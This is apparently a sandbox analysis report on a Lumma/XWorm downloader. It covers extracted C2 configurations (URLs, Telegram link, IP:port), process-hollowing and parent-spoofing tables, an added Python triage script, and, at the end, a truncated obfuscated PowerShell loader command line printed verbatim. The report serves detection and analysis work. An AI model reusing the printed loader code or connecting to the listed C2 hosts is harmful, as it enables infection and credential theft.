Analysis
max time kernel: 150s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/06/2025, 19:12
Static task: static1
Behavioral task: behavioral1
Sample: NewTextDocument.exe
Resource: win10v2004-20250502-en
General
Target: NewTextDocument.exe
Size: 4KB
MD5: a239a27c2169af388d4f5be6b52f272c
SHA1: 0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256: 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512: f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP: 48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted: lumma
https://t.me/vstalnasral555
https://runtnwq.run/gajh
https://narrathfpt.top/tekq
https://escczlv.top/bufi
https://localixbiw.top/zlpa
https://korxddl.top/qidz
https://stochalyqp.xyz/alfp
https://diecam.top/laur/api
https://citellcagt.top/gjtu
https://peppinqikp.xyz/xaow
Extracted: xworm
5.0
154.53.41.5:1144
tHwBSicFuDZAqRPQ
install_file: USB.exe
The 4KB submitted file is only the first stage: it downloads further PE files (see Downloads MZ/PE file) and executes them, and the Xworm config above was extracted from the dropped XClient.exe (PID 3604, matched by the family_xworm rule below).
Signatures
-
Detect Xworm Payload 2 IoCs
resource | yara_rule
behavioral1/files/0x00070000000241f1-147.dat | family_xworm
behavioral1/memory/3604-251-0x0000000000690000-0x000000000069E000-memory.dmp | family_xworm
(PID 3604 is XClient.exe, see Executes dropped EXE.)
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description | pid | Process | procid_target
PID 2344 created 608 | 2344 | powershell.EXE | 5
PID 6084 created 608 | 6084 | powershell.EXE | 5
PID 608 is winlogon.exe (see Processes). The two dllhost.exe instances that the process tree shows under winlogon.exe (PIDs 2596 and 1552) are the processes these same PowerShell PIDs subsequently set the thread context of (see Suspicious use of SetThreadContext), i.e. the PowerShell instances created children with winlogon.exe as the claimed parent.
Xworm family
-
Command and Scripting Interpreter: PowerShell
pid | Process
2344 | powershell.EXE
6084 | powershell.EXE
1608 | powershell.exe
2244 | powershell.exe
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 4 IoCs
flow | pid | Process
9 | 5500 | NewTextDocument.exe
9 | 5500 | NewTextDocument.exe
9 | 5500 | NewTextDocument.exe
32 | 5500 | NewTextDocument.exe
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation | NewTextDocument.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelName.vbs | hJ5bmFj.exe
Executes dropped EXE 16 IoCs
pid | Process
5684 | 1UGwDFF.exe
4532 | t3u2Imz.exe
4884 | hJ5bmFj.exe
6012 | 94mG4Ak.exe
3604 | XClient.exe
3504 | hJ5bmFj.exe
1380 | hJ5bmFj.exe
6024 | hJ5bmFj.exe
1820 | hJ5bmFj.exe
1628 | jxlvfvkylpsp.exe
5816 | hJ5bmFj.exe
1592 | hJ5bmFj.exe
4784 | hJ5bmFj.exe
2224 | hJ5bmFj.exe
4592 | hJ5bmFj.exe
4632 | hJ5bmFj.exe
Five distinct second-stage binaries are started by NewTextDocument.exe (1UGwDFF.exe, t3u2Imz.exe, hJ5bmFj.exe, 94mG4Ak.exe, XClient.exe); the remaining entries are hJ5bmFj.exe (PID 4884) re-launching copies of itself, which it also writes into (see Suspicious use of WriteProcessMemory).
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
3836 | powercfg.exe
2968 | powercfg.exe
4808 | powercfg.exe
4348 | powercfg.exe
1004 | powercfg.exe
5292 | powercfg.exe
5860 | powercfg.exe
5600 | powercfg.exe
All eight instances enable SeShutdownPrivilege and SeCreatePagefilePrivilege (see Suspicious use of AdjustPrivilegeToken); their command lines are not captured on this page.
Drops file in System32 directory 16 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File opened for modification | C:\Windows\system32\MRT.exe | 1UGwDFF.exe
File opened for modification | C:\Windows\system32\MRT.exe | jxlvfvkylpsp.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
Two of these rows matter: the dropped 1UGwDFF.exe and the later jxlvfvkylpsp.exe both open C:\Windows\system32\MRT.exe, the Malicious Software Removal Tool binary, for modification. The rest are side effects of code running as LocalSystem (C:\Windows\system32\config\systemprofile is the LocalSystem profile): PowerShell's startup-profile cache and CLR usage log, Office Click-to-Run telemetry, and the CryptnetUrlCache entries that svchost.exe maintains for certificate revocation data.
Suspicious use of SetThreadContext 8 IoCs
description | pid | Process | procid_target
PID 4532 set thread context of 4768 | 4532 | t3u2Imz.exe | 95
PID 6012 set thread context of 1356 | 6012 | 94mG4Ak.exe | 104
PID 5684 set thread context of 2480 | 5684 | 1UGwDFF.exe | 127
PID 1628 set thread context of 4916 | 1628 | jxlvfvkylpsp.exe | 172
PID 1628 set thread context of 4180 | 1628 | jxlvfvkylpsp.exe | 173
PID 1628 set thread context of 924 | 1628 | jxlvfvkylpsp.exe | 178
PID 2344 set thread context of 2596 | 2344 | powershell.EXE | 180
PID 6084 set thread context of 1552 | 6084 | powershell.EXE | 182
Targets that are named elsewhere on this page: 4768 and 1356 are MSBuild.exe (Suspicious behavior: EnumeratesProcesses), 924 is dialer.exe (Suspicious use of AdjustPrivilegeToken), and 2596 and 1552 are the two dllhost.exe instances under winlogon.exe in the Processes tree. 4768, 1356 and 2480 also appear as WriteProcessMemory targets of the same PIDs (that table is capped at 64 rows), the write-then-redirect sequence of process hollowing.
Launches sc.exe 14 IoCs
sc.exe is the Windows utility for controlling services on the system.
pid | Process
4360 | sc.exe
2196 | sc.exe
772 | sc.exe
6044 | sc.exe
4984 | sc.exe
1952 | sc.exe
5340 | sc.exe
4940 | sc.exe
5948 | sc.exe
5156 | sc.exe
4020 | sc.exe
4720 | sc.exe
3640 | sc.exe
3164 | sc.exe
Fourteen sc.exe launches go with the Creates new service(s) and Stops running service(s) TTPs above; the sc.exe command lines are not captured on this page.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MSBuild.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | hJ5bmFj.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MSBuild.exe
(The two MSBuild.exe readers are the hollowed instances 4768 and 1356, so the language check is done by the injected payloads, not by MSBuild itself.)
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process (every ioc path below is under \REGISTRY\USER\.DEFAULT\, the profile hive used by LocalSystem)
Key created | Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key deleted | Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Set value (int) | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | Software\Microsoft\SystemCertificates\Root\Certificates | dialer.exe
Key created | Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Set value (int) | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Set value (int) | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Set value (str) | Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 05 Jun 2025 19:14:42 GMT" | OfficeClickToRun.exe
Key created | Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Almost all of this is the certificate-store container keys and the default ZoneMap values that Windows creates the first time an account uses the crypto and WinINet APIs; here the account is LocalSystem, which again shows the PowerShell instances running as SYSTEM. No existing trust setting is changed and no certificate is added. The OfficeClickToRun.exe rows are background Office telemetry (the RulesLastModified timestamp also fixes the run date as 5 June 2025). The one dialer.exe row is the only entry from an injected process: dialer.exe (PID 924) is a target of jxlvfvkylpsp.exe in the SetThreadContext table.
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process | rows (64 rows in report order, consecutive repeats collapsed)
4768 | MSBuild.exe | 4
1356 | MSBuild.exe | 4
5684 | 1UGwDFF.exe | 1
1608 | powershell.exe | 3
5684 | 1UGwDFF.exe | 15
4884 | hJ5bmFj.exe | 20
1628 | jxlvfvkylpsp.exe | 1
2344 | powershell.EXE | 3
2244 | powershell.exe | 2
1628 | jxlvfvkylpsp.exe | 11
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process (64 rows in report order; privileges enabled by the same PID in consecutive rows are listed together)
Token: SeDebugPrivilege | 5500 | NewTextDocument.exe
Token: SeDebugPrivilege | 4884 | hJ5bmFj.exe
Token: SeDebugPrivilege | 3604 | XClient.exe
Token: SeDebugPrivilege | 1608 | powershell.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 1004 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 5292 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 5600 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 5860 | powercfg.exe
Token: SeDebugPrivilege | 4884 | hJ5bmFj.exe
Token: SeDebugPrivilege | 2344 | powershell.EXE
Token: SeDebugPrivilege | 2244 | powershell.exe
Token: SeLockMemoryPrivilege | 924 | dialer.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 3836 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 4808 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 2968 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 4348 | powercfg.exe
Token: SeDebugPrivilege | 2344 | powershell.EXE
Token: SeDebugPrivilege | 2596 | dllhost.exe
Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege | 2088 | svchost.exe (this 12-privilege set appears three times in a row, then SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege once more, where the 64-row cap cuts the table off)
Two rows stand out: dllhost.exe 2596, a COM surrogate that never needs SeDebugPrivilege, enables it after powershell.EXE 2344 has set its thread context; and dialer.exe 924, another SetThreadContext target, enables SeLockMemoryPrivilege, the privilege required for large-page memory allocation.
Suspicious use of UnmapMainImage 2 IoCs
pid | Process
3972 | RuntimeBroker.exe
3552 | Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target | rows (64 rows in report order, identical rows collapsed)
PID 5500 wrote to memory of 5684 | 5500 | NewTextDocument.exe | 90 | 2
PID 5500 wrote to memory of 4532 | 5500 | NewTextDocument.exe | 93 | 2
PID 4532 wrote to memory of 4768 | 4532 | t3u2Imz.exe | 95 | 9
PID 5500 wrote to memory of 4884 | 5500 | NewTextDocument.exe | 98 | 3
PID 5500 wrote to memory of 6012 | 5500 | NewTextDocument.exe | 99 | 2
PID 5500 wrote to memory of 3604 | 5500 | NewTextDocument.exe | 102 | 2
PID 6012 wrote to memory of 5788 | 6012 | 94mG4Ak.exe | 103 | 3
PID 6012 wrote to memory of 1356 | 6012 | 94mG4Ak.exe | 104 | 9
PID 2892 wrote to memory of 2616 | 2892 | cmd.exe | 113 | 2
PID 5684 wrote to memory of 2480 | 5684 | 1UGwDFF.exe | 127 | 6
PID 4884 wrote to memory of 3504 | 4884 | hJ5bmFj.exe | 141 | 4
PID 4884 wrote to memory of 1380 | 4884 | hJ5bmFj.exe | 142 | 4
PID 4884 wrote to memory of 6024 | 4884 | hJ5bmFj.exe | 143 | 4
PID 4884 wrote to memory of 1820 | 4884 | hJ5bmFj.exe | 145 | 4
PID 4884 wrote to memory of 5816 | 4884 | hJ5bmFj.exe | 146 | 4
PID 4884 wrote to memory of 1592 | 4884 | hJ5bmFj.exe | 147 | 4
The two or three writes from a parent into a freshly created child are what a normal process launch looks like in this table; the nine-write runs into 4768 and 1356 (both MSBuild.exe) and the six into 2480, each followed by a SetThreadContext from the same PID, are the hollowing of those processes. The table stops at 64 rows, so the dllhost.exe targets of the two PowerShell instances are not shown here.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
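The NtCreateUserProcessOtherParentProcess, SetThreadContext and WriteProcessMemory tables above describe the same few events from three angles, and the parent each hollowed process ends up with is only visible in the Processes tree further down. The Python below is an added example, not part of the report, that parses rows in the page's flattened layout and rebuilds, per injected PID, who wrote into it, who redirected its thread, and whether the parent the tree shows is one the injector claimed rather than the injector itself. The input is a constructed subset of the rows above; the parent map is taken from the tree, except that the parents of 5500, 4532 and 4768 are assumed because that part of the tree is cut off on this page. It also assumes that a "PID X created Y" description names in Y the PID the creator passed as the parent of its new child, which is how the two dllhost.exe instances come to sit under winlogon.exe.

```python
"""Rebuild the injection chains from the report's signature rows and check each
hollowed process against the parent the Processes tree shows. Added example;
not code from the sandbox or from the sample."""
import re
from collections import defaultdict

# Constructed input: rows copied from the SetThreadContext, WriteProcessMemory
# and NtCreateUserProcessOtherParentProcess tables above, in the page's own
# flattened "description pid Process procid_target" layout. Only the chains
# discussed here are included (the report lists 64 Wri‌teProcessMemory rows).
ROWS = """\
PID 4532 set thread context of 4768 4532 t3u2Imz.exe 95
PID 2344 set thread context of 2596 2344 powershell.EXE 180
PID 6084 set thread context of 1552 6084 powershell.EXE 182
PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95
PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95
PID 4532 wrote to memory of 4768 4532 t3u2Imz.exe 95
PID 5500 wrote to memory of 4532 5500 NewTextDocument.exe 93
PID 2344 created 608 2344 powershell.EXE 5
PID 6084 created 608 6084 powershell.EXE 5
"""

# child PID -> (parent PID, image), as the Processes tree shows it. The entries
# for 5500/4532/4768 are assumptions: that part of the tree is cut off on the
# page, and the WriteProcessMemory rows make these the obvious parents.
TREE = {
    608:  (None, "winlogon.exe"),
    2596: (608,  "dllhost.exe"),
    1552: (608,  "dllhost.exe"),
    1132: (None, "svchost.exe -k netsvcs -p -s Schedule"),
    2344: (1132, "powershell.EXE"),
    6084: (1132, "powershell.EXE"),
    5500: (None, "NewTextDocument.exe"),   # assumption
    4532: (5500, "t3u2Imz.exe"),           # assumption
    4768: (4532, "MSBuild.exe"),           # assumption
}

ROW = re.compile(r"PID (\d+) (set thread context of|wrote to memory of|created) (\d+) \d+ (\S+) \d+$")


def parse_rows(text):
    """Return (actor_pid, verb, target_pid, actor_image) per row. A row that does
    not fit the layout raises, so a mangled line is noticed rather than dropped."""
    events = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        actor, verb, target, image = m.groups()
        events.append((int(actor), verb, int(target), image))
    return events


def reconstruct(events, tree):
    """Per injected PID: writes into it, who redirected its thread, and whether
    its parent in the tree is a PID the injector claimed as parent ("created"
    rows are read as: actor passed target as the parent of a new child)."""
    chains = defaultdict(lambda: {"writes": 0, "writer": None, "context_set_by": None})
    claimed_parent = {}
    for actor, verb, target, image in events:
        if verb == "wrote to memory of":
            chains[target]["writes"] += 1
            chains[target]["writer"] = (actor, image)
        elif verb == "set thread context of":
            chains[target]["context_set_by"] = (actor, image)
        else:
            claimed_parent[actor] = target
    for pid, c in chains.items():
        parent, image = tree.get(pid, (None, "?"))
        injector = (c["context_set_by"] or c["writer"])[0]
        c["image"] = image
        c["tree_parent"] = parent
        c["hollowed"] = c["context_set_by"] is not None
        c["spoofed_parent"] = (parent if parent != injector and claimed_parent.get(injector) == parent
                               else None)
    return dict(chains)


def describe(chains, tree):
    """One line per injected PID, for a report or a ticket."""
    lines = []
    for pid, c in sorted(chains.items()):
        who = c["context_set_by"] or c["writer"]
        verdict = "thread context replaced" if c["hollowed"] else "memory written only"
        if c["spoofed_parent"] is not None:
            verdict += f", parent spoofed to {tree[c['spoofed_parent']][1]} ({c['spoofed_parent']})"
        lines.append(f"{pid} {c['image']}: {verdict} by {who[1]} ({who[0]}), {c['writes']} write(s)")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(reconstruct(parse_rows(ROWS), TREE), TREE)))
```

Run as a script it prints one line per target; for 2596 and 1552 the verdict carries "parent spoofed to winlogon.exe (608)", for 4768 it is a plain hollowing of a child by its real parent, and 4532 is reported as written but not hollowed. The distinction matters for triage: a SetThreadContext target whose tree parent is not the process that wrote into it will not be caught by parent/child rules alone.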
Processes
(indentation shows depth in the process tree; each entry is image path | command line | PID, followed by the signatures attributed to that process)

C:\Windows\system32\winlogon.exe | winlogon.exe | PID 608
    C:\Windows\system32\dwm.exe | "dwm.exe" | PID 316
    C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{ad13a311-2a06-4d5b-a28d-c2c488daadcb} | PID 2596
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{baac7772-f4f1-4c81-bef4-89a906e4264d} | PID 1552
C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID 656
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID 948
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID 408
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID 868
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID 1132
    C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | PID 2928
    The two powershell.EXE entries below are the next depth-2 children of this Schedule service host (PID 1132), i.e. they were started through the Task Scheduler, which matches the Uses Task Scheduler COM API signature; their command lines are kept exactly as captured. The two dllhost.exe instances listed under winlogon.exe above are not ordinary children of winlogon: they are the processes these PowerShell instances created with winlogon.exe as the claimed parent and then set the thread context of (see the NtCreateUserProcessOtherParentProcess and SetThreadContext tables).
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YzbKDlkEvoiP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NOOBoIueVBTvCZ,[Parameter(Position=1)][Type]$mPhNQzYMLi)$bYTABmYnzBr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+'D'+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+''+'e'+'','Class,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$bYTABmYnzBr.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+'i'+'g,'+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+'e'+[Char](100)+'');$bYTABmYnzBr.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+
'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+'a'+''+[Char](108)+'',$mPhNQzYMLi,$NOOBoIueVBTvCZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $bYTABmYnzBr.CreateType();}$mROtnFNlpOpQK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 